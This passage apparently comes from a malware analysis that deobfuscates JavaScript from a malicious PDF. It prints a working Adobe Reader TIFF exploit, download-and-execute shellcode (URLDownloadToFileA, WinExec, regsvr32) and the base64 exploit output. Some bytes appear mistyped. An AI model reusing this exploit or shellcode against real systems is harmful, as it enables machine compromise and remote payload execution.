        end_tiff = "\x6bB+A\x53j\x69\x51\x68E\x709fo\x42K/////w\x41AAA\x42AAAAA\x41\x41AAAAAQAAAAAAAA\x70WO\x41S\x69\x41Ji\x6b\x71WIYBKkB+A\x53\x6a\x43\x51hErY\x704B\x4bjauASiYAA\x41\x41AAA\x41AAAAAAAA\x41\x41ABBQUFBQUFBQaVjgEp\x71aV\x6dNM7WASqVjgEp0JAS\x4eT0uC\x53q\x56j\x67Ep4\x44POkIg6CSqJ\x6agEpB\x51U\x46\x42M\x63lki3\x45wi3YMi3Y\x63i24\x49i0YgizZm\x4fU\x67\x59dfKL\x52Ty\x4cVAV4\x41eqLciA\x427jHJ\x51\x610\x426IsYK1\x67EgfvlIN3/d\x659\x4ai1okAetmiwxLi1oc\x41es\x44LIuJ5moE/\x7ab/1YXArX\x581gThJSS\x6f\x41\x64\x652WM\x63\x6d1\x41/Ol";
    }
    tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
    tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////"+end_tiff;
    pgGzgu.rawValue = tiff;
}
run();



As always more JavaScript. Get the new JS ready for node-js:

function base64_encode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        ac = 0,
        enc = "",
        tmp_arr = [];

    do {
        o1 = data.charCodeAt(i++);
        o2 = data.charCodeAt(i++);
        o3 = data.charCodeAt(i++);

        bits = o1 << 16 | o2 << 8 | o3;

        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;

        tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    } while (i < data.length);

    enc = tmp_arr.join('');

    return enc;
}

function get_ver() {
    //var app_ver = app.viewerVersion.toString();
    //@malforsec changed to work
    var app_ver = "9.3.0";
    app_ver = app_ver.replace('.', '');
    while (app_ver.length < 4) {
        app_ver += '0';
    }
    return parseInt(app_ver, 10);
}

function grow(body, len) {
    while (body.length < len) {
        body += body;
    }
    return body.substring(0, len);
}

function run() {
    var url_var = fGRdP + "&h=03\x00";
    shell = "\xE8\x00\x00\x00\x00]\x83\xED\x051\xC9d\x8Bq0\x8Bv \x8Bv\x1C\x8BF\x08\x8B~ \x8B6f9O\x18u\xF2\xBE\xEF\xOO\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\xOO\xOO\x89\xEA\x81\xC2\xEF\x00\x00\x00Rh\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\xOO\x00\x001\xF6\x01\xC2\x8A\x9C5\x00\x02\x00\x00\x80\xFB\x00t\x06\x88\x1C2F\xEB\xEE\xC6\x042\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00R\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00RP\xFF\x95\xD7\x00\x00\x00j\x00j\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00R\x89\xEA\x81\xC2
\x02\x00\x00Rj\x00\xFF\xD0j\xO5\x89\xEA\x81\xC2\xEF\x00\xOO\xOOR\xFF\x95\xDB\x00\x00\x00j\x05\x89\xEA\x81\xC2\xE3\xOO\xOO\x00R\xFF\x95\xDB\x00\xOO\x00j\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\xOO\x00\x00\x00\x00\xOO\x00\x00\x00\x00\x00\x00\x00\x00regsvr32 -s GetTempPathA\x00LoadLibraryA\x00GetProcAddress\x00WinExec\x00ExitProcess\x00\xBB\x89\xF2\x89\xF70\xC0\xAEu\xFD)\xF7\x89\xF91\xC0\xBE<\x00\x00\x00\x03\xB5\xB8\x01\x00\x00f\xAD\x03\x85\xB8\x01\x00\x00\x8Bpx\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00P\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB^1\xDB\xADV\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7Q\xFC\xF3\xA6Yt\x04^C\xEB\xE9^\x93\xD1\xE0\x03\x85\xC4\x01\x00\x001\xF6\x96f\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00VW\xE8X\xFF\xFF\xFF_^\xAB\x01\xCE\x80>\xBBt\x02\xEB\xED\xC3URLMON.DLL\x00URLDownloadToFileA\x00User32.exe\x00";
    shell += url_var;
    while (shell.length < 1044) shell += "\xOO";
    shell = base64_encode(shell);

    if (get_ver() < 9000) {
        end_tiff = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
    } else {
        end_tiff = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
    }
    tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
    tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////" + end_tiff;
    //pgGzgu.rawValue = tiff;
    console.log(tiff);
}
//@malforsec add due to heavy deletion in previous step
fGRdP = "";
// @malforsec - end add section
run();


And we get this output, as the script says: base64_encoded


SUkqADggAACQQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB6AAAAABdg+OFMclki3Ewi3YMi3YciOYIi34gizZmOU8YdfK+7wAAAAHuv88AAAAB7+iAAQAAieqBwu8AAABSaIAAAAD/lc8AAACJ6oHC7wAAADH2AcKKnDUAAgAAgPsAdAaIHDJG6+7GBDIAieqBwuIBAABS/5XTAAAAieqBwuOBAABSUP+V1wAAAGoAagCJ6oHC7wAAAFKJ6oHCCwIAAFJqAP/QagWJ6oHC7wAAAFL/ldsAAABqBYnqgcLjAAAAUv+V2wAAAGoA/5XfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByZWdzdnIzMiAtcyBHZXRUZW1wUGFOaEEATG9hZExpYnJhcnlBAEdldFByb2NBZGRyZXNzAFdpbkV4ZWMARXhpdFByb2Nlc3MAu4nyifcwwK51/Sn3ifkxwL48AAAAA7W4AQAAZqODhbgBAACLcHiDxhwDtbgBAACNvbwBAACtA4W4AQAAq6ODhbgBAABQq6ODhbgBAACrXjHbrVYDhbgBAACJxonXUfzzpllOBF5D6+lek9HgA4XEAQAAMfaWZq3B4AIDhbwBAACJxqODhbgBAADD6xAAAAAAAAAAAAAAAAAAAAAAiYW4AQAAVlfoWP///19eqwHOgD67dALr7cNVUkxNTO4uRExMAFVSTERvd25sb2FkVG9GaWxlQQBVc2VyMzIuZXhlACZoPTAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEpOJASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyiOU8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==


And bin output:


:
